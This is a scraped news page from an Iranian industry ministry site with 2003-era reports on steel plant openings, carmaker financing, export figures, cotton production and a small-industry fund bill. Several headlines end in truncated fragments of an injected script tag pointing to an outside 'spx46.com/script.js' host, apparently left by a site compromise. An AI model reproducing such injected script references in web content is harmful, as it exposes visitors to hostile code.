• سرفصل اخبار
  • پربازدیدترین اخبار
  •  
  • فهرست اخبار
   تست

   تست

   متن ?

   خودروسازان از منابع مالی بین المللی استفاده خواهند کرد

   خودروسازان از منابع مالی بین المللی استفاده خواهند کرد

   معاون وزیر امور اقتصاد و دارایی اعلام کرد: سازمان سرمایه گذاری وزارت اموراقتصاد و دارایی شرایط لازم برای بهره گیری خودروسازان و به خصوص ایران خودرو از امکانات و منابع مالی بین المللی را فراهم می کند.
   محمد خزایی ضمن بیان این مطلب گفت: این تسهیلات به صورت وام یا جلب سرمایه گذاری خارجی خواهد بود و تلاش می شود در بخشهای مختلف تولید خودرو در ایران میزان سرمایه گذاری خارجی افزایش یابد.
   وی با اشاره به آزادسازی واردات خودرو اظهار داشت: باید به خودروسازان کمک کرد تا با کاهش هزینه‌های تولید و افزایش کیفیت توان رقابتی خود را به صورت جدی در برابر خودروسازان خارجی افزایش دهند وامکان صادرات گسترده محصولات آنان به بازارهای هدف فراهم شود.
   خزایی با تاکید بر آمادگی سازمان سرمایه گذاری وزارت اقتصاد برای تجهیز منابع مالی و خارجی ایران خودرو و تجهیز نیروی انسانی مورد نیاز شرکت در مقوله‌های مالی و ارتباطات بین الملل گفت: با حضور در بازارهای خارجی و اطمینان بخشی به سرمایه‌گذاران آینده بسیار خوبی را برای صنعت خودروی کشور میتوان پیش‌بینی کرد.
   وی افزود: گزارش مدیریت ارشد ایران خودرو در خصوص برنامههای آتی شرکت در راستای نوآوری و افزایش تولید و ارتقای کیفیت همگی گواه بر این است که اقدامات بسیار ارزشمندی در ایران خودرو انجام شده است که باید از آن حمایت کرد.
   معاون وزیر اقتصاد و امور دارایی با اشاره به ضرورت افزایش با بهینه‌سازی استفاده از منابع مالی و نفوذ در بازارهای صادراتی گفت: ایران خودرو تولید سالانه یک میلیون دستگاه خودرو در سال 1378 را هدف قرار داده است که این اتفاق در صنعت خودرو کشور حائز اهمیت خواهد بود.
   وی محور اصلی مذاکرات با مدیریت ارشد شرکت را یافتن منابع مالی جدید برای ایران خودرو و کمک به تجهیز منابع مالی در سطوح بین المللی ذکر کرد.
   وی در پایان خاطر نشان ساخت: مردم باید از نزدیک با دستاوردهای ایران خودرو آشنا شوند تا نگرش آنان نسبت به صنعت خودرو متحول شده و بی‌اعتنا از کنار تحولات انجام شده نگذرند.

   رئیس جمهور پس از افتتاح ورق قلع اندود در مجتمع فولاد مبارکه : باید به لوازم پیشرفت در عرصه های اقتصادی، اجتماعی و قضایی تن دهیمspx46.c

   رئیس جمهور پس از افتتاح ورق قلع اندود در مجتمع فولاد مبارکه : باید به لوازم پیشرفت در عرصه های اقتصادی، اجتماعی و قضایی تن دهیمspx46.c

   حجت الاسلام والمسلمین خاتمی، رئیس جمهور که پس از افتتاح ورق قلع اندود در مجتمع فولاد مبارکه و در جمع مدیران و کارکنان سخن می گفت، اظهار داشت : امروز برای صنعت و تولید کشور روز خوب و بزرگی است آنچه را امروز در این دو واحد دیدیم و افتتاح شد امیدهای ما را برای آینده ی بهتر و برخورداری بیشتر ، زیادی می کند.
   وی افزود: آینده ی این کشور را با توجه به ظرفیتها درخشان می بینم در صورتی که اولا عزم برای ایجاد این پیشرفت باشد و ثانیا به لوازم این پیشرفت در عرصه های اقتصادی، اجتماعی و قضائی تن دهیم.
   وی افزود : باید دلخور باشیم که این کشور با این عظمت و سابقه در مقایسه با بعضی از کشورهای دیگر عقب تر است در حالی که می تواند در منطقه قدرت برتر و درعرصه های جهانی تاثیر گذار باشد.
   خاتمی مجتمع فولاد مبارکه را یکی از کانونهای ارزنده ی اقتصاد و صنعت کشور و
   پشتوانه ی فعالیتهایی که د رکشور صورت میگیرد دانست و گفت : این مجتمع حاصل تلاشهای بعد از انقلاب است و روز به روز ما را برای انجام کارهای بزرگ و نیازمندی به دیگران کم می کند و البته این به معنای بی نیازی و قطع رابطه با دیگران نیست و هنوز در خیلی از زمینه های مصرف کننده ی تولیدات دیگران هستیم و کشوری نیست که در همه ی زمینه ها بی نیاز از دیگران باشد.
   وی افزود : امروز بدون تردید جمهوری اسلامی ایران نه تنها در تولید می تواند کارهای بزرگی بکند بلکه آمادگی این را دارد که تولیدات خود را به خارج نیز صادر کند و با سیاستهای درست باید این کار تداوم یابد.
   خاتمی کشور ما را به لحاظ داشتن منابع کشوری غنی خواند و افزود : مهم این است که از این منابع چگونه استفاده کنیم و مثلا در مورد نفت تکیه بر تولید و صدور آن بوده است ، گرچه به لطف خداوند در این سالها به حساب ذخیره ارزی تلاش شد بخشی از این درآمدها در جهت تولید اشتغال و سازندگی به کار افتد و در حال حاضر متجاوز از دو میلیون و هشتصد میلیارد دلار عقد قرارداد داشته ایم.
   وی یکی از تلاشهای دولت را بالا بردن ارزش افزوده دانست.
   رئیس جمهوری در ادامه ی سخنانش پس از افتتاح بهره برداری از خط تولید ورق قلع اندود در مجتمع فولاد مبارکه گفت : پیش بینی ما از ایجاد 120 هزار فرصت شغلی به 190 هزار فرصت شغلی افزایش یافته است.
   وی تلاش برای بالابردن ارزش افزوده را باعث بروز این نتیجه خواند که به جای صادرات سنگ آهن 22 دلاری موفق به صدور ورق قلع اندود 60 دلاری شویم و با این ارزش افزوده در عرض دو یا سه سال سرمایه گذاری خوبی را به انجام برسانیم.
   رئیس جمهور بر ایجاد و گسترش واحدهای پائین دستی در صنعت فولاد کشور تاکید کرد و افزود : گسترش فولاد در اصفهان در زمیه های مختلفی صورت گرفته است و ما مناطق محرومی داریم که می توان با ایجاد صنایع پائین دستی، مشکلات آنها را حل کرد.
   وی رشد 5/11 درصدی صنعت و ایجاد 200 هزار شغل در آینده را در جهت جهش اقتصادی و جایگاه کشور ، مهم تصویب کرد.
   پیش از سخنان رئیس جمهور ، مهندس محمد اسلامیان (مدیرعامل شرکت فولاد مبارکه) و اسحاق جهانگیری (وزیر صنایع و معادن)به ایراد سخن پرداختند.
   همچنین در بخشی از این برنامه از 11 تن از نمایندگان شرکتهای پیمانکاری و مدیران برجسته با اهدای لوح سپاس توسط رئیس جمهور قدردانی شد.

   طرح بزرگ فولاد سبا در اصفهان به بهره برداری رسید

   طرح بزرگ فولاد سبا در اصفهان به بهره برداری رسید

   طرح بزرگ صنعتی مجتمع فولاد سبا در شرکت سهامی ذوب آهن اصفهان روز شنبه با حضور سید محمد خاتمی رئیس جمهوری ایران به بهره برداری رسید.
   رئیس جمهوری صبح روز شنبه به منظور دیدار با مردم شهرهای لنجان و مبارکه و همچنین افتتاح دو طرح بزرگ فولاد سبا در ذوب آهن اصفهان و کارخانه تولید ورق قلع اندود فولاد مبارکه وارد اصفهان شد.
   مجتمع فولاد سبا با ظرفیت تولید 700 هزار تن ورق احداث شده و از استعداد لازم برای افزایش تولید تا سقف 4/1 میلیون تن در سال برخوردار است. سبا نخستین واحد صنعتی کشور است که ورق فولادی ضد زنگ تولید می کند و با تولید این محصول، نیاز کشور به ورقهای ضد زنگ و استیل تامین می شود.
   با راه اندازی مجتمع فولاد سبا از خروج 50 میلیون دلار ارز در سال جلوگیری می شود.
   برای اجرای این طرح 930 میلیارد ریال و 377 میلیون دلار هزینه شده و 70 درصد از تجهیزات آن از منابع داخلی تامین شده است .
   تولیدات این مجتمع را فولادهای کیفی و ضد زنگ تشکیل می دهد که در صنایع شیمیائی، غذایی و لوازم خانگی کاربرد دارد.
   طرح بزرگ مجتمع فولاد سبا از واحدهای فولاد سازی، ریخته گری تختال نازک و نورد گرم تشکیل شده و تولید تختال نازک به ضخامت 50 میلی متر از امتیازات مهم آن بشمار می رود.
   اشتغالزائی این طرح در دوران ساخت 990 نفر به طور مستقیم و یکهزار و 980 نفر به طور غیر مستقیم بوده است و این میزان در زمان بهره برداری، 600 نفر به صورت مستقیم و 7200 نفر به طور غیر مستقیم اعلام شده است. 91 درصد پیش بینی برنامه سوم در بخش صادرات مواد معدنی تحقق یافت.

   صادرات مواد معدنی در چهار ماه نخست سال 1382، حدود 91 درصد پیش بینی های برنامه سوم توسعه اقتصادی کشور را تحقق بخشیدspx46.com/script.js>

   صادرات مواد معدنی در چهار ماه نخست سال 1382، حدود 91 درصد پیش بینی های برنامه سوم توسعه اقتصادی کشور را تحقق بخشیدspx46.com/script.js>

   نتایج حاصل از آمار مقدماتی گمرک ایران حاکی از آن است که در مدت یاد شده بیش از 879 هزار و 800 تن انواع مواد معدنی به ارزش 58 میلیون و 900 هزار دلار از کشور صادر شد.
   متوسط قیمت صادرات هر تن مواد معدنی حدود 9/66 دلار بوده که در مقایسه با مدت مشابه سال قبل حدود 2/23 درصد کاهش نشان می دهد.
   نسبت ارزشی و وزنی صادرات مواد معدنی از کل صادرات غیر نفتی کشور در این مدت به ترتیب 6/14 و 2/4 درصد بود که نسبت به مدت مشابه سال قبل از نظر وزنی 6/4 درصد افزایش و از لحاظ ارزشی 5/0 درصد کاهش نشان می دهد. ارزش اقلام اساسی صادرات این بخش شامل سنگ و کنستانتره روی 11 میلیون و 700 هزار دلار، سنگ ساختمانی کار نشده شش میلیون و 500 هزار دلار و سنگ و کنستانتره مولیبدن پنج میلیون دلار بود.
   بیشترین افزایش ارزش صادرات در این مدت مربوط به بنتونیت و بیشترین کاهش ارزش صادرات مربوط به گوگرد کانی بود.
   همچنین بیشترین افزایش قیمت صادرات در مدت یادشده مربوط به سنگ و کنستانتره مولیبدن و بالاترین کاهش قیمت مربوط به سنگ ساختمانی کار نشده بود.

   مدیرکل صنایع نساجی و پوشاک : میزان تولید پنبه در ایران روند نزولی دارد

   مدیرکل صنایع نساجی و پوشاک : میزان تولید پنبه در ایران روند نزولی دارد

   مدیرکل صنایع نساجی و پوشاک وزارت صنایع و معادن اعلام کرد: میزان تولید پنبه در سالهای اخیر روند نزولی داشته است و در سال جاری به حدود 90 تا 100 هزار تن می رسد.
   گلنار نصراللهی روز یکشنبه در جمع خبرنگاران گفت: پیش بینی شده که در سال زراعی آینده نیز میزان تولید پنبه به میزان 70 تا 80 هزار تن برسد ، این در حالی است که سرمایه گذاری های انجام شده در این صنعت، با احتساب تولید پنبه داخلی بوده است.
   وی نیاز کشور به پنبه را بین 130 تا 140 هزار تن برآورد کرد و افزود : کیفیت پنبه داخلی نامناسب نیست، اما هیچ کشوری هم تمام واریته های پنبه را تولید نمی کند به گونه ای که در اغلب کشورهای تولید کننده عمده پنبه، واردات و صادرات پنبه آزاد است.
   وی ادامه داد : برخی از انواع پنبه مورد نیاز صنایع نساجی ، اکنون در داخل کشور تولید
   نمی شود، میزان تولید ناکافی و فرایندهای پس از تولید پنبه نیز در کشور مطلوب نیست.
   نصراللهی به آزادسازی واردات پنبه اشاره کرد و گفت: صنعت نساجی در مرحله نخست به توسعه کشت پنبه در داخل و حمایت از آن و سپس تسهیل در واردات میزان مورد نیاز این صنعت تمایل دارد.
   به اعتقاد وی حمایت از کشت پنبه باید به گونه ای باشد که به صنعت نساجی لطمه وارد نشود.
   مدیرکل صنایع نساجی و پوشاک به عملکرد این صنعت در سال گذشته و سال جاری اشاره کرد و گفت : در سه ماهه نخست سال جاری 92 واحد صنایع نساجی، پوشاک و چرم با اشتغال یک هزار و 730 نفر راه اندازی شده است.
   صادرات نساجی در چهارماهه نخست امسال به 71 میلیون دلار رسید که نسبت به مدت مشابه سال قبل 5/1 درصد رشد داشت.
   صادرات چرم و کفش نیز به 30 میلیون دلار رسید که نسبت به سال گذشته کاهش داشته است. وی افزود: در سال گذشته نیز 575 واحد صنایع نساجی با اشتغالزائی 8900 نفر در کشور به بهره برداری رسید.

   وزیر صنایع و معادن در مراسم افتتاح مجتمع فولاد سبا : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی ایجاد نخواهد شدspx46.com/script.js></scri

   وزیر صنایع و معادن در مراسم افتتاح مجتمع فولاد سبا : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی ایجاد نخواهد شدspx46.com/script.js></scri

   جهانگیری وزیر صنایع و معادن که در مراسم افتتاح مجتمع فولاد سبا ، سخن می گفت با بیان این که در ایامی که کشور در حال تدوین برنامه چهارم توسعه است، مجتمع فولاد سبا هدیه ارزشمندی برای ملت ایران است.
   جهانگیری، توسعه صنعتی را برای کشور ضروری و اساسی و برنامه‌ای ملی برای کشور دانست و اظهار داشت : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی کشور ایجاد نخواهد شد.
   وزیرصنایع ، بیان کرد: استراتژی توسعه صنعتی با هدف ایجاد فضای محیطی کشور تدوین شده است.
   وی افزود: کشوری که در سال 82 صادرات صنعتی آن به 3 میلیارد دلار در سال برآورد می شد، اینک با بیش از 30 میلیارد دلار ارزش صادرات صنعتی برخوردار است.
   وی، افزود : در توسعه صنعتی بخش خصوصی مهمترین محور توسعه صنعتی خواهد بود و باید فضای محیطی و امنی به لحاظ حقوقی و سیاسی و مالی فراهم شود.
   جهانگیری، ضمن اشاره به سیاستهای کلان کشور، خاطر نشان کرد: در برنامه سوم توسعه ی کشور بخش صنعتی رشد بالای 10 درصد را تجربه کرده است که این رشد برای سال 82 پیش بینی می شود.
   وی به ایجاد بنگاههای صنعتی در کشور اشاره کرد و افزود : امید داریم این بنگاه ها و شرکتهای بتوانند نقش موثر خود را در عرصه توسعه صنعتی کشور ایفا کنند.
   جهانگیری، افزود : در استراتژی توسعه صنعتی، بهره برداری حداکثر از منابع طبیعی و معدنی کشور مورد توجه قرار گرفته که در آینده باید مورد توجه بیشتری باشد. خصوصی سازی در بنگاه‌های دولتی در حال حاضر غیر ممکن است و با توجه به قانون اساسی نیاز به تدوین قوانین جدید دارد.
   وزیر صنایع و معادن، در بخش دیگری از سخنان خود، افزود: درصنایع صنعتی متکی بر منابع طبیعی باید باتحقیق و پژوهش بیشتر به دانش و فناوری روز دنیا دست یابیم.
   هنگامی از منابع طبیعی خود به عنوان یک ظرفیت بهره می بریم که بتوانیم با تکیه بر دانش روز دنیا آن را در توسعه صنعتی کشور مورد استفاده قرار دهیم.
   وزیر صنایع و معادن، اظهار داشت: باید با یک تفاهم جدی صنایع انرژی‌زا را در حاشیه ی خلیج فارس راه اندازی کنیم و تفاهمات اولیه در این زمینه انجام گرفته است.
   جهانگیری، افزود: در سال‌جاری پس از فولاد با راه اندازی طرحهای جدید ظرفیت مس کشور نیز افزایش خواهد یافت.

   استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد

   استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد

   عباس سلیمیان گفت: استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد.
   عباس سلیمیان در گفتوگو با خبرگزاری فارس افزود: زیرا این دیدگاه تجربه جهانی در دهه گذشته است. مطالعه گروهی این استراتژی ، نیز آن را تایید کرد.
   وی افزود: مهمترین پتانسیل کشور، شبکه تامین قطعات خودرو است. این که قسمتهای مختلف صنعت عملا چه کار کنند، توسط 8- 7 گروه در وزارت صنایع و معادن پیگیری میشود. در زمینه صنعت خودرو مطالعات کاملا حرفهای انجام شده است.
   استاد دانشگاه بوعلی سینا همدان با تاکید بر این که اراده برای ماندن در وضع کنونی صنعت وجود ندارد، گفت: جایگاه حاضر در صنعت فاصله زیادی با دنیا دارد و مطرح کردن رشد 8 درصدی توسط سازمان مدیریت برای کاستن فاصله است.
   وی مهمترین پتانسیل در صنعت کشور را شبکه تامین قطعات خودرو دانست و گفت: پیش از دو هزار قطعهساز وجود دارند که فقط قطعات خودرو تولید نمیکنند ،بلکه هر قطعه صنعتی دیگر، مانند قطعات لوازم خانگی را هم میتوانند طراحی و تولید کنند.
   سلیمیان صنعت خودرو را مهمترین بخش صنعت خواند و گفت: خودروسازی فرآیندهای بسیاری از مواد صنعتی داشته و کارگاه آموزشی بزرگ صنعتی کشور است. نگاه کلی در این صنعت این است که ارادهای برای ماندن در وضع موجود نیست.
   وی افزود: برنامه آینده نگر و آیندهساز وجود دارد ، اما چون امکان ساختن آینده بر طبق مراد وجود ندارد، باید آینده را خوب شناسایی کرده تا بر اساس تجربه گذشته مسیر نو انتخاب شود.
   سلیمیان یادآور شد اگر بخواهیم خودرو تولید کنیم، طبق سیاست آیندهنگر باید مفهوم خودرو با خودروی 20 سال آینده مطابق باشد. بررسیها نشان داده خودروهای آینده مبتنی بر موتور احتراق نیست، بلکه بر مبنای انرژی نو و خواسته مشتری است این خواست در قیافه خودرو متجلی میشود.
   وی افزود: الگوی انرژی خودروهای آینده میگوید در سال 2020 موتور پیل سوخت (انرژی جدید از متانول، بنزین و الکل با تری الکتریکی میسازد) است.
   سلیمیان گفت: در تکنولوژی پیل سوختی 7-6 سال از دنیا عقبتر اما در موتور احتراقی 60-50 سال عقبتر هستیم. در عین حال 90- 80 درصد دانش آن در کشور وجود دارد.بنابراین یک اقتصاد انرژی جدید باید طراحی شود. محصولات پتروشیمی به سمت پیل سوختی برود.
   کارشناس ارشد خودرو گفت: مدیریت خودرو باید دو کار کند، یکی جمع‌آوری تکنولوژی کهنه و دیگری جایگزینی تکنولوژی جدید. در غیر این صورت باید طراح استراتژی صنعتی عوض شود.

   صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود

   صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود

   در صورت تصویب مجلس شورای اسلامی، صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود.
   بنا به پیشنهاد وزارت صنایع و معادن لایحه تاسیس صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط در جلسه مورخ 29/4/1382 هیات وزیران به تصویب رسیدو جهت تصویب نهایی به مجلس شورای اسلامی تقدیم شد.
   در مقدمه توجیهی این لایحه میخوانیم: با عنایت به ضرورت تامین منابع مالی مورد نیاز طرحهای کوچک صنعتی اشتغال زا و عدم توانایی متخصصین و نیروهای خلاق در تامین منابع مالی طرحهای یاد شده و وثایق مورد انتظار بانکهای کشور و به منظور تشویق نیروهای مذکور جهت سرمایه گذاری در واحدهای کوچک صنعتی و شتاب بخشیدن به ایجاد و توسعه اشتغالهای مولد و پایدار، این لایحه به تصویب رسید.
   متن لایحه تاسیس صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط به شرح زیر است: ماده واحده _ به منظور فراهم آوردن موجبات توسعه سرمایه گذاری بخش غیردولتی در صنایع کوچک و متوسط، کوتاه کردن مدت زمان اجرای طرحهای صنایع کوچک و متوسط اشتغال زا و دارای توجیه اقتصادی، با اولویت مناطق کمتر توسعه یافته و تضمین و تسهیل در توثیق تسهیلات اعطایی به طرحهای مذکور، به دولت اجازه داده می شود «صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط» را به صورت شرکت دولتی و زیر نظر وزارت صنایع و معادن تاسیس کند.
   سرمایه اولیه صنعتی یاد شده مبلغ پانصد میلیارد ریال خواهد بود که در مدت پنج سال در قانون بودجه کل کشور تامین خواهد شد.
   اساسنامه و شرح وظایف صندوق مزبور با همکاری وزارتخانههای صنایع و معادن، امور اقتصادی و دارایی، جهاد کشاورزی، بازرگانی، بانک مرکزی جمهوری اسلامی ایران و سازمان مدیریت و برنامه ریزی کشور، ظرف مدت سه ماه تهیه و به تصویب هیات وزیران خواهد رسید.
   این لایحه به شماره 25554/27400 به تاریخ 12/5/82 به مجلس تقدیم شد.

   صادرات انواع کالاهای صنعتی از ایران 2/18 درصد افزایش یافت

   صادرات انواع کالاهای صنعتی از ایران 2/18 درصد افزایش یافت

   ارزش صادرات انواع کالاهای صنعتی ایران در چهارماه نخست سال 82 نسبت به مدت مشابه سال قبل حدود 2/18 درصد افزایش یافت.
   بر اساس نتایج حاصل از آمار مقدماتی گمرک جمهوری اسلامی ایران دراین مدت بیش از سه میلیون و 400 هزارتن انواع کالاهای صنعتی به ارزش یک میلیارد و 58 میلیون دلار صادر شد.
   این میزان صادرات از لحاظ وزنی نسبت به مدت مشابه سال قبل 7/3 درصد کاهش یافت.
   بر اساس آمار به دست آمده ؟ نسبت وزن و ارزش صادرات بخش صنعت و پتروشیمی از کل صادرات غیر نفتی در مدت زمان یاد شده به ترتیب 5/74 درصد و 66 درصد بود.
   همچنین نسبت ارزش محصولات صنعتی در سبد کالاهای غیر نفتی در چهارماه نخست امسال نسبت به مدت مشابه سال قبل حدود 2/1 درصد کاهش و قیمت صادرات بخش صنعت و پتروشیمی در این مدت نسبت به مدت مشابه سال قبل حدود 7/22 درصد افزایش یافت.
   با توجه به اهداف سومین برنامه توسعه ، بخش صنعت 7/90 درصد از اهداف این برنامه را در این مدت تحقق بخشیده است.
   سه قلم نخست صادارت بخش صنعت و پتروشیمی به ترتیب شامل « گازها» 141 میلیون دلار ، « آهن آلات و فولاد» بیش از 90 میلیون دلار و «آلومینیوم ساخته شده » 81 میلیون و 500 هزار دلار ارزش داشت.
   بیشترین افزایش صادرات در میان ده قلم نخست کالاهای صادراتی این بخش در چهار ماه نخست سال جاری نسبت به مدت مشابه سال قبل مربوط به «آلومینیوم ساخته شده» و بیشترین کاهش ارزش صادرات درهمین مدت مربوط به «البسه » بود.

ستاد خبری مرکز حراست وزارتخانه

88846668

آدرس :

تهران، خیابان کریمخان، خیابان استاد نجات الهی، خیابان سمیه، نبش کوچه پورموسی، وزارت صنعت، معدن و تجارت

کد پستی :

1599691379

تلفن :

81771-81761

پست الکترونیک :

info@mimt.gov.ir

مجموع بازدیدها : 242,285,450
تعداد بازدید امروز : 17,217
تعداد بازدید دیروز : 55,848
تعداد بازدید هفته : 184,479
تعداد بازدید این ماه : 584,556
آخرین به روزرسانی : 1399/09/11 00:25

کلیه حقوق متعلق به وزارت صنعت، معدن و تجارت می باشد.